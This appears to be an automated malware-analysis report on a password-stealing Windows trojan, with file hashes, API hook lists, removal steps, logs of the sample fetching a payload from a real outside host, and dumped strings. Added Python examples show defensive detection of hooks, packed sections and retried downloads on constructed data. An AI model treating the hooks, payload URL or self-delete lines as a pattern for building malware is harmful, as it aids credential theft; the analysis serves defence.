Susp_Dropper (Kaspersky), Gen:Variant.Barys.748 (B) (Emsisoft), Gen:Variant.Barys.748 (AdAware), Trojan-PSW.Win32.Zbot.6.FD, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, TrojanPSWZbot.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Backdoor
This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
Summary
MD5: dc8d3a4717d1599906bcb167809d33c0
SHA1: 7dc40767595422d3ccd210d1668f367377b6ed3e
SHA256: 403c281118a3fc242a092d3294a55b5ee7aaf00e2035bc589c66e9fd3da1d605
SSDeep: 3072:EjtkodpMluxmOVxElsg u2PYm2fKSJO8X5CplXadEuKGrtHrjbe0mrth:EWow2m6UsgRhzJAlXhGZHwrX
Size: 178688 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: Packer UPX Compresor Gratuito www.upx.sourceforge.net, UPolyX v0.5_v6
Company: no certificate found
Created at: 2007-04-05 03:38:27
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. A Trojan program intended to steal users' passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:928
igkyy.exe:1416
The Trojan injects its code into the following process(es):
Explorer.EXE:1140
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Numi\igkyy.exe (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpda114793.bat (177 bytes)
Registry activity
The process %original file name%.exe:928 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry. Note that HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed is rewritten by any process that uses the Windows CryptoAPI random number generator, and Shell Folders\AppData is commonly rewritten by the shell when a process queries the Application Data folder path, so neither is an indicator on its own; the HKCU\Software\Microsoft\Roypx value is the sample-specific artifact:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 89 12 69 34 4B F2 77 EB B0 BC 6A 4B A7 E5 79"
[HKCU\Software\Microsoft\Roypx]
"Tuafv" = "C1 CF E7 74 CB 0B E7 B2 6A 71 A1 E1 7E F5 7F 67"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process igkyy.exe:1416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 C6 35 5C 93 A3 16 7C EE EC 63 4F BE 56 31 3A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
Dropped PE files
MD5 | File path |
---|---|
800a6e38496ed8ef0a0ec7cc62d1acb7 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Numi\igkyy.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
The Trojan installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan installs the following user-mode hooks in USER32.dll:
SetCursorPos
DefMDIChildProcA
DefFrameProcA
DefDlgProcA
GetClipboardData
DefMDIChildProcW
DefFrameProcW
GetUpdateRgn
RegisterClassA
GetDCEx
ReleaseCapture
SetCapture
DefWindowProcA
CallWindowProcA
GetUpdateRect
PeekMessageA
CallWindowProcW
GetMessagePos
GetCursorPos
EndPaint
BeginPaint
DefWindowProcW
RegisterClassExA
GetMessageA
DefDlgProcW
SwitchDesktop
OpenInputDesktop
RegisterClassExW
RegisterClassW
GetCapture
PeekMessageW
GetMessageW
GetWindowDC
TranslateMessage
GetDC
ReleaseDC
The Trojan installs the following user-mode hooks in WS2_32.dll:
WSASend
send
closesocket
The Trojan installs the following user-mode hooks in kernel32.dll:
GetFileAttributesExW
The Trojan installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
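The hook list above is the part of this report a responder can act on: HttpSendRequest*/InternetReadFile* in WININET see HTTP(S) request and response data before WININET encrypts it, send/WSASend see raw socket writes, PFXImportCertStore sees client certificates and the password used to import them, and the USER32 paint/DC hooks are consistent with screen capture. The following is an added example, not code from the report or from Lavasoft, of the check used to find such hooks: compare the first bytes of an export as they sit in process memory with the clean bytes of the same export on disk, and when they differ, decode the trampoline at the entry and test whether it leaves the module's image. The memory and disk bytes, module base address and hook target (placed inside the 0x01E00000 rwx region the report shows injected into Explorer.EXE) are constructed stand-ins.

```python
# Added example: inline (prologue) hook detection on constructed data.
# No live process is read; "mem" and "disk" below stand in for the two reads.
import struct

MODULE_BASE = 0x7E410000   # assumed load address of user32.dll in the target process
MODULE_SIZE = 0x00091000   # assumed SizeOfImage
CHECK_LEN = 8              # number of prologue bytes compared


def decode_redirect(entry_va, code):
    """Return (kind, target) if the entry starts with a recognised trampoline, else None."""
    if len(code) >= 5 and code[0] == 0xE9:                      # JMP rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return ("jmp_rel32", (entry_va + 5 + rel) & 0xFFFFFFFF)
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:  # PUSH imm32 ; RET
        return ("push_ret", struct.unpack_from("<I", code, 1)[0])
    if len(code) >= 6 and code[:2] == b"\xff\x25":              # JMP DWORD PTR [abs32]
        # Returns the pointer slot, not the final target; a real scanner dereferences it.
        return ("jmp_indirect", struct.unpack_from("<I", code, 2)[0])
    return None


def check_export(name, entry_va, mem, disk):
    """Classify one export as clean, hooked (redirect leaves the module),
    patched_in_module (redirect stays inside the module, e.g. hotpatch) or modified."""
    if mem[:CHECK_LEN] == disk[:CHECK_LEN]:
        return {"export": name, "verdict": "clean"}
    redirect = decode_redirect(entry_va, mem)
    if redirect is None:
        return {"export": name, "verdict": "modified",
                "detail": "prologue differs from disk, no recognised trampoline"}
    kind, target = redirect
    inside = MODULE_BASE <= target < MODULE_BASE + MODULE_SIZE
    return {"export": name, "verdict": "patched_in_module" if inside else "hooked",
            "kind": kind, "target": target}


def scan(exports):
    """exports: iterable of (name, entry_va, mem_bytes, disk_bytes)."""
    return [check_export(*e) for e in exports]


# Constructed sample (assumption, not taken from the report): a typical hot-patchable
# prologue, and three USER32 exports of which only GetClipboardData is hooked.
CLEAN = b"\x8b\xff\x55\x8b\xec\x83\xec\x10"  # mov edi,edi ; push ebp ; mov ebp,esp ; sub esp,10h
GETCLIPBOARD = 0x7E43B1A0                    # assumed export address
HOOK_TARGET = 0x01E05A30                     # assumed offset inside the injected rwx region
HOOKED = b"\xe9" + struct.pack("<i", HOOK_TARGET - (GETCLIPBOARD + 5)) + CLEAN[5:]
HOTPATCHED = b"\x68" + struct.pack("<I", MODULE_BASE + 0x1234) + b"\xc3" + CLEAN[6:]

SAMPLE = [
    ("GetClipboardData", GETCLIPBOARD, HOOKED, CLEAN),
    ("DefWindowProcA", 0x7E42C1F0, CLEAN, CLEAN),
    ("BeginPaint", 0x7E41A2C0, HOTPATCHED, CLEAN),
]

if __name__ == "__main__":
    for r in scan(SAMPLE):
        print(r)
```

A scanner built on this logic must take the disk copy from the same module version that is loaded (relocations applied at the same base), otherwise every export with an absolute address in its first bytes shows up as modified; comparing only the first 5 to 8 bytes, as here, keeps most exports free of relocations.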
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan the system with an anti-rootkit tool.
- Terminate the malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:928
igkyy.exe:1416
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\Numi\igkyy.exe (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpda114793.bat (177 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Note that the Trojan also injects code into Explorer.EXE:1140 (see Process activity); terminating the two processes above does not stop that injected code, so check after the reboot that the files listed above have not been recreated.
Static Analysis
VersionInfo
Company Name: Worst
Product Name: Gnash Bert
Product Version: 7.4
Legal Copyright: Copyright (c) Ogles Ethos 2002-2009
Legal Trademarks:
Original Filename: Lice.exe
Internal Name: Raced Pies Cinch Pore
File Version: 7.4
File Description: Flaw Lawns
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 32768 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 36864 | 176128 | 176128 | 5.4315 | 541df89d7879922750b596f07c630e04 |
.rsrc | 212992 | 4096 | 1024 | 2.47399 | 3b5e80d5ebc970fad52d1802fdfa25ce |
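The section table above is a textbook UPX layout: UPX0 has no data on disk (raw size 0, and its section MD5 d41d8cd98f00b204e9800998ecf8427e is the MD5 of zero bytes) but 32 KiB reserved in memory as the unpacking destination, while UPX1 holds the compressed image. The following added example, not code from the report or from Lavasoft, parses IMAGE_SECTION_HEADER records and applies those heuristics. The 40-byte headers are constructed from the values in the table; the Characteristics flags are the ones UPX normally sets and the PointerToRawData values are assumptions, since the report lists neither.

```python
# Added example: parse PE section headers and flag packer indicators.
import math
import struct

SECTION_FMT = "<8sIIIIIIHHI"     # IMAGE_SECTION_HEADER, 40 bytes
SECTION_SIZE = struct.calcsize(SECTION_FMT)
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def make_section(name, vaddr, vsize, raw_size, raw_ptr, characteristics):
    """Build one header record (used only to construct the sample below)."""
    return struct.pack(SECTION_FMT, name.ljust(8, b"\0"), vsize, vaddr,
                       raw_size, raw_ptr, 0, 0, 0, 0, characteristics)


def parse_sections(blob, count):
    """Decode `count` consecutive IMAGE_SECTION_HEADER records from `blob`."""
    sections = []
    for i in range(count):
        (name, vsize, vaddr, raw_size, raw_ptr,
         _, _, _, _, chars) = struct.unpack_from(SECTION_FMT, blob, i * SECTION_SIZE)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "raw_size": raw_size,
                         "raw_ptr": raw_ptr, "chars": chars})
    return sections


def shannon_entropy(data):
    """Entropy in bits per byte; 0.0 for empty input, matching the table's UPX0 row."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def packer_indicators(sections):
    """Return the reasons a section table looks packed, one string per finding."""
    hits = []
    for s in sections:
        if s["name"].upper().startswith("UPX"):
            hits.append("%s: UPX section name" % s["name"])
        if s["raw_size"] == 0 and s["vsize"] > 0:
            hits.append("%s: 0 bytes on disk but %d bytes reserved in memory (unpacking destination)"
                        % (s["name"], s["vsize"]))
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            hits.append("%s: writable and executable" % s["name"])
    return hits


# Constructed sample from the table above. Characteristics (assumption): the values
# UPX usually writes; PointerToRawData values are assumed.
SAMPLE_TABLE = (
    make_section(b"UPX0", 4096, 32768, 0, 1024, 0xE0000080)
    + make_section(b"UPX1", 36864, 176128, 176128, 1024, 0xE0000040)
    + make_section(b".rsrc", 212992, 4096, 1024, 177152, 0xC0000040)
)

if __name__ == "__main__":
    for line in packer_indicators(parse_sections(SAMPLE_TABLE, 3)):
        print(line)
```

On a real file the section headers start at the offset given by the PE header (e_lfanew + 4 + 20 + SizeOfOptionalHeader) and NumberOfSections comes from the file header; the entropy function is meant to be run over each section's raw bytes, which is how the Entropy column above was produced.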
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://ultimatelives.com/images/unpacked/direct/X.bin | 216.38.198.78 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:33 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:23 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:32 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:23 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:44 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:5
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:39 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:38 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:53 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:44 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
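Every request above is identical apart from the server's Date header, and every one gets a 400 "Invalid Hostname" back, which typically means the server at that IP no longer has a site bound to the ultimatelives.com name; the payload was not obtained, consistent with "No specific payload has been found" above. The following is an added example, not code from the report or from Lavasoft, of detection logic for that pattern: it parses a captured HTTP stream into request/response pairs and flags a client that keeps re-requesting the same remote binary with identical headers and keeps getting 4xx responses. The capture is constructed from three of the transactions on this page plus one unrelated successful fetch (the host example.com and its User-Agent are placeholders).

```python
# Added example: parse captured HTTP transactions and flag retried payload fetches.
from collections import defaultdict


def parse_stream(data):
    """Split a captured client/server byte stream into messages. Requests have no body
    here; responses are consumed according to Content-Length."""
    msgs = []
    pos = 0
    while pos < len(data):
        end = data.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        lines = data[pos:end].decode("latin-1").split("\r\n")
        start, headers = lines[0], {}
        for line in lines[1:]:
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        pos = end + 4
        body = b""
        kind = "request"
        if start.startswith("HTTP/"):
            kind = "response"
            length = int(headers.get("content-length", "0"))
            body = data[pos:pos + length]
            pos += length
            if data[pos:pos + 2] == b"\r\n":   # trailing CRLF after the body, as in the capture above
                pos += 2
        msgs.append({"kind": kind, "start": start, "headers": headers, "body": body})
    return msgs


def transactions(msgs):
    """Pair each request with the response that follows it."""
    pairs, i = [], 0
    while i + 1 < len(msgs):
        req, resp = msgs[i], msgs[i + 1]
        if req["kind"] == "request" and resp["kind"] == "response":
            method, path, _ = req["start"].split(" ", 2)
            pairs.append({"method": method, "host": req["headers"].get("host", ""),
                          "path": path, "ua": req["headers"].get("user-agent", ""),
                          "status": int(resp["start"].split(" ")[1]),
                          "date": resp["headers"].get("date", "")})
            i += 2
        else:
            i += 1
    return pairs


def flag_retried_downloads(pairs, min_repeats=3):
    """Flag (host, path) targets requested at least min_repeats times with one fixed
    User-Agent where every answer was a 4xx: an automated fetch, not a person browsing."""
    by_target = defaultdict(list)
    for p in pairs:
        by_target[(p["host"], p["path"])].append(p)
    findings = []
    for (host, path), hits in by_target.items():
        if (len(hits) >= min_repeats
                and len({h["ua"] for h in hits}) == 1
                and all(400 <= h["status"] < 500 for h in hits)):
            findings.append({"host": host, "path": path, "count": len(hits),
                             "user_agent": hits[0]["ua"], "first": hits[0]["date"],
                             "last": hits[-1]["date"]})
    return findings


def build_sample():
    """Constructed capture built from the transactions shown on this page."""
    req = (b"GET /images/unpacked/direct/X.bin HTTP/1.1\r\nAccept: */*\r\nConnection: Close\r\n"
           b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; "
           b".NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)\r\n"
           b"Host: ultimatelives.com\r\nCache-Control: no-cache\r\n\r\n")
    body = b"<h1>Bad Request (Invalid Hostname)</h1>"
    stream = b""
    for date in (b"Thu, 02 Jul 2015 22:28:23 GMT", b"Thu, 02 Jul 2015 22:28:32 GMT",
                 b"Thu, 02 Jul 2015 22:28:33 GMT"):
        stream += req + (b"HTTP/1.1 400 Bad Request\r\nContent-Type: text/html\r\nDate: " + date
                         + b"\r\nConnection: close\r\nContent-Length: " + str(len(body)).encode()
                         + b"\r\n\r\n" + body + b"\r\n")
    # Placeholder benign transaction (assumption) so the filter has something to ignore.
    stream += (b"GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/7.0\r\n\r\n"
               b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok\r\n")
    return stream


if __name__ == "__main__":
    for f in flag_retried_downloads(transactions(parse_stream(build_sample()))):
        print(f)
```

The same grouping works on proxy logs once they are reduced to (host, path, user-agent, status, time) tuples; the User-Agent constancy test matters because the string sent here is fixed in the binary, whereas the one in the Explorer.EXE dump further down reads "MSIE 7.0", so a host emitting two different IE versions from one process is itself worth a look.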
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
Explorer.EXE_1140_rwx_01E00000_00025000:
.text
`.data
.reloc
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
g.bi>
PR_OpenTCPSocket
HTTP/1.1
userenv.dll
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
del "%s"
if exist "%s" goto d
del /F "%s"
hXXp://VVV.google.com/webhp
hXXp://
hXXps://
HTTP/1.
'=%"6,6
6-,>..70>
Wmkoipj%idedoah-sg0}
: $"06 ,
}zoyecg{.dzf
$93 $3#5#
%0' ;>>,
KM].diekbau
, >(3=2;
)4>-)>.8.
121
1;5;;64|
3=??/:; )
PSSj%S
GetProcessHeap
KERNEL32.dll
ExitWindowsEx
GetKeyboardState
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
MsgWaitForMultipleObjects
SetKeyboardState
MapVirtualKeyW
USER32.dll
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
RegCreateKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpSendRequestA
InternetCrackUrlA
HttpOpenRequestA
HttpAddRequestHeadersA
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
WININET.dll
OLEAUT32.dll
NETAPI32.dll
explorer.exe
rdpclip.exe
ctfmon.exe
wscntfy.exe
taskeng.exe
taskhost.exe
dwm.exe
ntdll.dll
nspr4.dll
*kernel32.dll
"%s" %s
SOFTWARE\Microsoft\Windows NT\CurrentVersion
%s_XX
/c "%s"
%sx.%s
%sx
SysShadow
cGlobal\XXX
%Documents and Settings%\%current user%\Application Data
{02E68633-E15C-97B5-6282-9039C9037CB6}
Global\{949D3418-5377-01CE-6282-9039C9037CB6}
%Documents and Settings%\%current user%\Application Data\Taenel\gyomp.fim
%Documents and Settings%\%current user%\Application Data\Taenel
gyomp.fim